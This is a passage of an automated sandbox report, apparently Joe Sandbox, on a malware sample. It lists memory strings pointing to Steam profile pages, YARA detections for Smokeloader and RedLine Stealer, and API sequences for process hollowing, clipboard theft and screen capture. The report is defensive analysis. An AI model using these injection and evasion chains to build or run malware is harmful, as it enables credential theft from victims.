                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englis
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engli
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
                  Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
                  Source: 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
                  Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                  Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
                  Source: katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: Yara match File source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0042EAB0 GetWindowInfo, OpenClipboard, GetClipboardData, GlobalLock, GlobalUnlock, CloseClipboard
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: 5_2_0042EC90 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,5_2_0042EC90
                  Source: Yara match File source: 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: C9A7.exe PID: 3944, type: MEMORYSTR

                  System Summary

                  Source: 12.2.C9A7.exe.42a7719.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 12.2.C9A7.exe.2590000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 12.2.C9A7.exe.2590000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 12.2.C9A7.exe.44d0000.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 12.2.C9A7.exe.44d0000.2.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 12.2.C9A7.exe.42a7719.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: 00000005.00000002.2691688506.00000000007BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: aarhevh.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: C:\Windows\explorer.exe Process Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401615
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401658
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00403406 NtTerminateProcess,GetModuleHandleA,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,0_2_00403406
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401620
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401524
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040162D
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Code function: 0_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401635
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Code function: 12_2_042D9B10 NtProtectVirtualMemory,NtProtectVirtualMemory,12_2_042D9B10
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Code function: 12_2_042DA4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,12_2_042DA4F0
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exe Code function: 12_2_042D9850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification,12_2_042D9850
                  Source: Joe Sandbox View Dropped File: C:\ProgramData\GIEHIDHJDBFI\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                  Source: Joe Sandbox View Dropped File: C:\ProgramData\GIEHIDHJDBFI\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: String function: 004087A0 appears 54 times
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: String function: 0214F807 appears 139 times
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: String function: 0040F5A0 appears 139 times
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exe Code function: String function: 02148A07 appears 57 times
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6CAC9F30 appears 31 times
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6C9B3620 appears 74 times
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6C9B9B10 appears 76 times
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6CB1D930 appears 49 times
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6CB1DAE0 appears 60 times
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp Code function: String function: 6CB109D0 appears 268 times
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 1724
                  Source: aarhevh.2.dr Static PE information: No import functions for PE file found
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: No import functions for PE file found
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 12.2.C9A7.exe.42a7719.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 12.2.C9A7.exe.2590000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 12.2.C9A7.exe.2590000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 12.2.C9A7.exe.44d0000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 12.2.C9A7.exe.44d0000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 12.2.C9A7.exe.42a7719.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000005.00000002.2691688506.00000000007BD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000005.00000002.2692059229.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: aarhevh.2.drStatic PE information: Section .text
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeStatic PE information: Section .text
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/35@4/9
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9F0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,13_2_6C9F0300
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_007BE78E CreateToolhelp32Snapshot,Module32First,5_2_007BE78E
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_0042B20E CoCreateInstance,5_2_0042B20E
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\aarhevhJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5640
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\21AE.tmpJump to behavior
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp, katA304.tmp, 0000000D.00000002.3135418858.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.13.dr, sqls[1].dll.13.dr, nss3.dll.13.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: softokn3[1].dll.13.dr, softokn3.dll.13.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
